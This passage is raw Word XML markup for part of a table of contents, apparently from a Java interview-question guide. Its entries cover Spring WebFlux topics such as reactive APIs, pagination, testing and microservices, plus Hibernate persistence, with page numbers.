            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>694</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4849A991" w14:textId="14776B7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concept of event-driven programming in the context of Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867747 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>695</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CFAF9D0" w14:textId="2707BE5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WebFlux handle asynchronous communication in event-driven systems?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867748 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>697</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="534E8E1B" w14:textId="02B2AA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use Spring WebFlux to implement a simple reactive REST API?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867749 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>699</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07AE9115" w14:textId="763F009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give an example of creating a simple controller using Mono and Flux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867750 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>702</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F007BFD" w14:textId="42682C7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integrate a database with a Spring WebFlux application?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867751 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>704</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60A17CF0" w14:textId="54FC69E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steps to connect a reactive database (like MongoDB or R2DBC) to Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867752 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>708</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E42EFD6" w14:textId="7FE2CD9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implement pagination in a reactive Spring WebFlux application?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867753 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>712</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58F7A6C1" w14:textId="02998A3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paginate large datasets using Mono or Flux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867754 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>715</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2FC514ED" w14:textId="6AC3CC1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you would test a reactive Spring WebFlux service?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867755 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>718</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36C0A7A2" w14:textId="7C918E3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tools or strategies would you use for testing reactive endpoints?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867756 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>722</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17EBBC09" w14:textId="645C6C2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ReactiveMongoTemplate in Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867757 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>725</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49995200" w14:textId="3C2A21E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it differ from MongoTemplate in traditional Spring applications?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867758 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>727</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19EBB4B3" w14:textId="0DED8B1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WebFlux compare to Vert.x and Akka HTTP?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867759 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>728</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="028003AF" w14:textId="480E1BD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pros and cons of using Spring WebFlux compared to other reactive frameworks?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867760 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>730</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0419FD16" w14:textId="44115D9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Spring WebFlux be used in a traditional servlet container like Tomcat?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867761 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>732</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="740EE46C" w14:textId="3B3ECD4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so, what are the limitations when running Spring WebFlux in a servlet container?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867762 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>733</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A5DF33D" w14:textId="68E5CC4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decide whether to use Spring WebFlux or Spring MVC for your application?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867763 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>734</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0149715C" w14:textId="159DF8D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type of applications are best suited for Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867764 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>735</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="798E962F" w14:textId="34624D0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ensure scalability in a reactive Spring WebFlux application?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867765 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>735</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E247904" w14:textId="14B84F0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optimize the performance of a WebFlux application with high traffic?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867766 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>736</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08438212" w14:textId="7205EA9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explain how you would use Spring WebFlux in a microservice architecture?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867767 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>737</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20E1AA82" w14:textId="21D5ED8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use reactive programming to integrate microservices?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867768 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>738</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C56F906" w14:textId="153A00EA"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769" w:history="1">
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Hibernate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867769 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>741</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F9C0CB4" w14:textId="0E2D057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noProof/>
              </w:rPr>
              <w:t>How data is persisted in database by using hibernate</w:t>
            </w:r>
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867770 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>741</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20A05811" w14:textId="0A6FD11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7867771 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>743</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
